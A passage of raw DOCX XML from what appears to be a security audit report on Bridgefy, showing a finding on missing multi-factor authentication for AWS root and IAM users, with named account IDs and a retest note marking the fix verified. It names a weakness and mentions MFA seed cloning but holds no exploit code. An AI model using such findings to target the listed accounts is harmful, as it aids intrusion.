      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>create</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>personal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>accounts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>daily</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>operations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>144</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>these</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>should</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>only have the absolute minimum permissions necessary to perform their function.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-024</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP4/5:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Missing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>MFA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>All</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>IAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="372"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Retest Notes: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Fix Verified. The Bridgefy team resolved this issue and 7ASecurity verified that the fix is valid.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="366"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It was found that the AWS root accounts in use do not currently have </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Multi Factor Authentication </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(MFA) enabled. Using MFA reduces the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>surface,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>necessary for the attacker to gain access to all factors required to successfully log in. It is a standard practice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>define</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>enforce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MFA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>users,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>only</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>administrators. Additionally, during the documentation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>review,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>noted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>controls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>such</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>as MFA are not mentioned to protect any account.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="370"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Please note hardware-based MFA mechanisms have an advantage over virtual</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MFA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>as physical access to the device is required, while in case of a Virtual MFA the attacker might potentially bypass MFA by cloning the seed (e.g. QR code).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="364"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Additionally, all regular users were found to have no multi-factor authentication devices attached. Since all users have administrative privileges, a compromise of a single user might lead</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>compromise</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>whole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>account,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>well</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>accounts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>where</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>users can assume various administrative roles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="582" w:lineRule="exact" w:before="32"/>
        <w:ind w:right="3392"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Weaknesses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MFA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>accounts Affected Resources:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="221" w:lineRule="exact" w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>745354931789</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>no</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>MFA)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>292595537002</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>virtual</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>MFA)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="399" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>confirmed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>navigating</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>IAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>home</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>view,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Management </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Console</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>PoC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>URL:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:hyperlink r:id="rId216">
        <w:r>
